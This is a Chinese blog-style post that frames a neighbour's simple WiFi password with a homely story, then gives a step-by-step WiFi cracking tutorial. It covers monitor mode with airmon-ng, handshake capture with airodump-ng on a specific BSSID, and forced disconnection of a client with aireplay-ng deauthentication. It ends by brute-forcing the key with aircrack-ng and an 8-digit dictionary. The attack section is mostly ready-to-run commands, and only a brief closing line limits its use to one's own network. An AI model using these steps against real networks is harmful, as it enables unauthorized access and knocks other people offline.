老王的Wifi
0x00 前言
在一个寒冷的冬日,我拖着重重的行李,踏上了回老家过年的路。老家的风景依旧,但每次回来总有一种说不出的亲切感涌上心头。
我推开家门,一股熟悉而温馨的气息扑面而来。然而,当我拿出手机想要连接网络时,却发现老家依然没有安装无线网络。我不禁有些失落,毕竟在现代社会,手机已经成为了我们生活中不可或缺的一部分。
正当我犹豫着要不要去镇上找个网吧时,忽然想起了邻居老王。老王是个热情好客的人,每次我回老家都会和他聊聊天,分享一些生活中的趣事。
我走到老王的门前,轻轻敲了敲门。不一会儿,门开了,老王那张熟悉而亲切的笑脸出现在我面前。
“哟,你回来啦!”老王热情地招呼道。
“是啊,老王,我过年回来了。”我笑着回应。
“快进来坐,外面冷。”老王热情地邀请我进屋。
我跟着老王进了屋,坐在了温暖的火炉旁。我们聊了一会儿家常,我忽然想起了无线网络的事情。
“老王,你家有无线网络吗?我这手机没网有点不方便。”我试探着问道。
“当然有啦,你直接用就行。”老王爽快地答道。
我心中一喜,连忙问道:“那密码是多少啊?”
老王笑了笑,神秘地说:“密码啊,你等会儿,我去给你拿张纸写下来。”
说着,老王起身走到里屋,不一会儿就拿着一张纸走了出来。我接过纸一看,上面赫然写着几个数字:“12345678”。
“这么简单?”我有些惊讶地问道。
老王嘿嘿一笑,说:“这密码用了好几年了,一直没换过。我觉得简单点好记,省的到时候自己都忘了。”
我笑着点了点头,心中对老王的朴实和热情有了更深的感受。我输入了密码,手机顺利地连接上了无线网络。我感激地向老王道了谢,然后和他继续聊起了家常。
那天的聊天很愉快,我们聊了很多关于老家的事情,也分享了一些彼此的生活经历。在老王家蹭网的时间里,我感受到了家乡的温暖和人与人之间的情谊。虽然老家没有城市的繁华和便利,但却有着一种独特的魅力和人情味。
0x01 连接Wifi
首先我们需要一个支持Linux
监听的无线网卡
比较合适的有以下几个:
RT3070(L)/RT5572:即插即用,支持混杂模式、注入模式、AP模式
RT8187(L):即插即用,支持混杂模式、注入模式、AP模式
AR9271:即插即用,支持混杂模式、注入模式、AP模式
在虚拟机-可移动设备里连接无线网卡
这里可以查看右下方是否点亮,点亮即为成功
确认连接完成后
输入airmon-ng
查看网卡是否支持监听模式
再输入iwconfig
,查看无线网络设备信息
开启网卡监听
airmon-ng start wlan0
网卡监听模式开启后
无线接口wlan0
变成wlan0mon
使用ifconfig -a
命令进行查看
前期准备工作已完成
1.1 准备抓取数据包
扫描环境中的WiFi
网络:
airodump-ng wlan0mon
使用airodump-ng
命令是列出无线热点的地址、信道等
使用名称为714
的无线热点
输入命令
sudo airodump-ng -w freedom -c 10 --bssid 24:7E:51:03:1B:C8 wlan0mon -ignore-nefative-oneaa
其中-c
是指定的信道
--bssid
为路由器的MAC
地址
使用命令后,发现两台客户机连接路由器,使用下方客户机MAC
地址。
1.2 抓取数据包并爆破
重新开启一个窗口,输入:
aireplay-ng -0 2 -a 24:7E:51:03:1B:C8 -c 0C:2C:54:EB:1A:2C wlan0mon
-a:指定路由器的MAC
-c:指定客户机的MAC
执行成功后,表明该客户机已被成功踢下线
经测试,发现目标机被强制下线后仍会自动连接
成功抓到包之后
需要ctrl+c
退出抓包
我们会在桌面上看到成功抓到的数据包
开始破解,使用密码生成工具生成8位数的字典
将生成的字典放到同一目录下
sudo aircrack-ng -w Wifi_pwd.txt freedom-*.ivs
成功爆破出密码
0x02 总结
如遇到无法扫描网段的情况,可以将本机重新启动
成功与否基本全靠字典的强大
仅供使用自己的WiFi
作为学习和测试,不要轻易私自破解他人WiFi
最后附上支持的无线网卡参考:
https://www.cnblogs.com/zysps1/p/kali_linux.html